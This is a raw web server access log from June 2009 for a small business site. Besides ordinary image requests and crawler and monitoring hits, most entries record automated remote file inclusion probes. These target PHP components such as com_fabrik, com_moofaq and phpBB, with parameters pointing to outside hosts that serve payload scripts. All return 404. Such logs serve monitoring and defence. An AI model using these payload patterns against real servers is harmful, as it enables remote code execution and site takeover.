151.1.154.24 - - [22/Jun/2009:00:01:25 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:01:25 -0400] "GET /logs/access_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:01:26 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
219.94.194.231 - - [22/Jun/2009:00:01:50 -0400] "GET /logs/error_log.Q109061000//components/com_fabrik/user_ajax_example.php?mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
71.228.53.237 - - [22/Jun/2009:00:03:09 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
71.228.53.237 - - [22/Jun/2009:00:03:09 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
71.228.53.237 - - [22/Jun/2009:00:03:11 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
71.228.53.237 - - [22/Jun/2009:00:03:11 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
209.59.12.99 - - [22/Jun/2009:00:04:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.223.3.98 - - [22/Jun/2009:00:05:33 -0400] "GET /index.php?arquivo=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:00:05:33 -0400] "GET /logs/access_log.Q109061800/index.php?arquivo=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:00:05:33 -0400] "GET /logs/index.php?arquivo=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:00:05:34 -0400] "GET /logs/index.php?arquivo=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:00:05:34 -0400] "GET /index.php?arquivo=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:00:05:34 -0400] "GET /logs/access_log.Q109061800/index.php?arquivo=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:00:05:53 -0400] "GET /logs/access_log.Q109053100/index.php?arquivo=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:00:05:57 -0400] "GET /logs/access_log.Q109053100/index.php?arquivo=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
219.94.194.231 - - [22/Jun/2009:00:07:02 -0400] "GET /logs/access_log.Q109061000///vwar/backup/errors.php?error=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
219.94.194.231 - - [22/Jun/2009:00:07:02 -0400] "GET ///vwar/backup/errors.php?error=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
219.94.194.231 - - [22/Jun/2009:00:07:03 -0400] "GET /logs///vwar/backup/errors.php?error=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
151.1.154.24 - - [22/Jun/2009:00:07:25 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:07:25 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:00:07:37 -0400] "GET /default.php?page=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:00:07:37 -0400] "GET /logs/default.php?page=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:00:07:38 -0400] "GET /logs/access_log.Q109051200%20%20/default.php?page=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:00:07:38 -0400] "GET /logs/access_log.Q109052400%20%20/default.php?page=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:08:12 -0400] "GET /logs/access_log.Q109052400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:00:08:25 -0400] "GET /logs/access_log.Q109061800%20%20/index.php?arquivo=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:00:08:25 -0400] "GET /logs/access_log.Q109061800%20%20/index.php?arquivo=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:00:08:40 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?arquivo=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.223.3.98 - - [22/Jun/2009:00:08:40 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?arquivo=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:00:09:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
208.111.94.201 - - [22/Jun/2009:00:09:22 -0400] "GET /logs/access_log.Q109052400/default.php?page=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
219.94.194.231 - - [22/Jun/2009:00:09:46 -0400] "GET /logs/access_log.Q109051000///vwar/backup/errors.php?error=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
208.111.94.201 - - [22/Jun/2009:00:09:49 -0400] "GET /logs/error_log.Q109051400/default.php?page=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:00:11:26 -0400] "GET /logs/access_log.Q109052400/default.php?page=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:11:46 -0400] "GET /logs/access_log.Q109050800/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:11:48 -0400] "GET /logs/access_log.Q109052900/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:00:11:51 -0400] "GET /logs/error_log.Q109051400/default.php?page=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.71.54 - - [22/Jun/2009:00:12:58 -0400] "GET /images/over-index8_kendalcgz.jpg HTTP/1.1" 200 1449 "-" "Googlebot-Image/1.0"
211.49.99.7 - - [22/Jun/2009:00:13:15 -0400] "GET /logs/access_log.Q109051500//&highlight=%27.include($_GET[a]),exit.%27&a=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 322 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:00:13:15 -0400] "GET /logs/access_log.Q109060600//&highlight=%27.include($_GET[a]),exit.%27&a=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 322 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:00:13:15 -0400] "GET //&highlight=%27.include($_GET[a]),exit.%27&a=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:00:13:15 -0400] "GET //&highlight=%27.include($_GET[a]),exit.%27&a=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:00:13:15 -0400] "GET /logs//&highlight=%27.include($_GET[a]),exit.%27&a=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:00:13:15 -0400] "GET /logs/access_log.Q109060600//&highlight=%27.include($_GET[a]),exit.%27&a=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 322 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:00:13:15 -0400] "GET /logs//&highlight=%27.include($_GET[a]),exit.%27&a=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:00:13:15 -0400] "GET /logs/access_log.Q109051500//&highlight=%27.include($_GET[a]),exit.%27&a=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 322 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:00:13:17 -0400] "GET /logs//&highlight=%27.include($_GET[a]),exit.%27&a=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:00:13:17 -0400] "GET /logs/access_log.Q109060600//&highlight=%27.include($_GET[a]),exit.%27&a=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 322 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:00:13:17 -0400] "GET /logs/access_log.Q109051500//&highlight=%27.include($_GET[a]),exit.%27&a=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 322 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:00:13:17 -0400] "GET //&highlight=%27.include($_GET[a]),exit.%27&a=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:00:14:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
208.111.94.201 - - [22/Jun/2009:00:14:45 -0400] "GET /logs/access_log.Q109061000%20%20//components/com_fabrik/fabrik_functions.php?mosConfig_absolute_path=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:00:14:45 -0400] "GET //components/com_fabrik/fabrik_functions.php?mosConfig_absolute_path=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:00:14:46 -0400] "GET /logs//components/com_fabrik/fabrik_functions.php?mosConfig_absolute_path=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:00:15:02 -0400] "GET /logs/error_log.Q109061000%20%20//components/com_fabrik/fabrik_functions.php?mosConfig_absolute_path=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:00:16:03 -0400] "GET /logs/access_log.Q109061000//components/com_fabrik/fabrik_functions.php?mosConfig_absolute_path=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:00:16:08 -0400] "GET /logs/error_log.Q109061000//components/com_fabrik/fabrik_functions.php?mosConfig_absolute_path=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:16:10 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:16:10 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:16:11 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
74.6.17.151 - - [22/Jun/2009:00:17:23 -0400] "GET /Includes/ HTTP/1.0" 200 220 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.49.99.7 - - [22/Jun/2009:00:17:54 -0400] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:00:17:54 -0400] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:00:17:54 -0400] "GET /logs/access_log.Q109051500//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:00:17:54 -0400] "GET /logs/access_log.Q109060600//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:00:17:56 -0400] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:00:17:56 -0400] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:00:17:56 -0400] "GET /logs/access_log.Q109060600//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:00:17:56 -0400] "GET /logs/access_log.Q109051500//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
216.139.67.116 - - [22/Jun/2009:00:17:58 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
216.139.67.116 - - [22/Jun/2009:00:17:58 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
216.139.67.116 - - [22/Jun/2009:00:17:58 -0400] "GET /logs/access_log.Q109061800%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:00:19:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.15.254.22 - - [22/Jun/2009:00:19:20 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
121.15.254.22 - - [22/Jun/2009:00:19:21 -0400] "GET /logs/access_log.Q109061800%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
121.15.254.22 - - [22/Jun/2009:00:19:21 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
213.189.2.38 - - [22/Jun/2009:00:19:48 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
213.189.2.38 - - [22/Jun/2009:00:19:48 -0400] "GET /logs/access_log.Q109061800%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
213.189.2.38 - - [22/Jun/2009:00:19:48 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:00:19:49 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:00:19:50 -0400] "GET /logs/access_log.Q109061800%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:00:19:50 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
213.189.2.38 - - [22/Jun/2009:00:19:56 -0400] "GET /logs/error_log.Q109061500%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
121.78.82.142 - - [22/Jun/2009:00:20:20 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
121.78.82.142 - - [22/Jun/2009:00:20:20 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
121.78.82.142 - - [22/Jun/2009:00:20:20 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:00:20:24 -0400] "GET /logs/access_log.Q109061500%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
121.78.82.142 - - [22/Jun/2009:00:20:24 -0400] "GET /logs/error_log.Q109061000/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
121.15.254.22 - - [22/Jun/2009:00:20:41 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
121.15.254.22 - - [22/Jun/2009:00:20:41 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
121.15.254.22 - - [22/Jun/2009:00:20:42 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
88.191.89.138 - - [22/Jun/2009:00:21:01 -0400] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
88.191.89.138 - - [22/Jun/2009:00:21:01 -0400] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
88.191.89.138 - - [22/Jun/2009:00:21:01 -0400] "GET /logs/access_log.Q109060600//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
88.191.89.138 - - [22/Jun/2009:00:21:01 -0400] "GET /logs/access_log.Q109051500//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
213.189.2.38 - - [22/Jun/2009:00:21:16 -0400] "GET /logs/access_log.Q109061800/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:21:32 -0400] "GET /index.php?arquivo=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:21:32 -0400] "GET /logs/index.php?arquivo=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:21:32 -0400] "GET /logs/access_log.Q109061800/index.php?arquivo=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:00:21:37 -0400] "GET /logs/access_log.Q109061800/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:21:44 -0400] "GET /logs/access_log.Q109053100/index.php?arquivo=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.15.254.22 - - [22/Jun/2009:00:22:05 -0400] "GET /logs/access_log.Q109061800/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
213.189.2.38 - - [22/Jun/2009:00:22:32 -0400] "GET /logs/error_log.Q109061500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
74.6.17.151 - - [22/Jun/2009:00:22:42 -0400] "GET /images/ACE_Creditform.pdf HTTP/1.0" 200 34160 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.78.82.142 - - [22/Jun/2009:00:22:50 -0400] "GET /logs/access_log.Q109051800%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
121.78.82.142 - - [22/Jun/2009:00:22:52 -0400] "GET /logs/error_log.Q109061000%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
216.139.67.116 - - [22/Jun/2009:00:22:53 -0400] "GET /logs/access_log.Q109061800/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:23:00 -0400] "GET /logs/access_log.Q109051500%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
74.6.17.151 - - [22/Jun/2009:00:23:24 -0400] "GET /images/_notes/nav_store_search_grn.jpg.mno HTTP/1.0" 200 247 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [22/Jun/2009:00:24:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.15.254.22 - - [22/Jun/2009:00:24:21 -0400] "GET /logs/access_log.Q109051800%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:00:27:59 -0400] "GET /logs/access_log.Q109061800%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:00:27:59 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:00:28:00 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:28:09 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:28:09 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:28:09 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:28:20 -0400] "GET /logs/access_log.Q109052200%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:29:01 -0400] "GET /index.phpmain.php?x=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
151.1.154.24 - - [22/Jun/2009:00:29:01 -0400] "GET /logs/index.phpmain.php?x=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
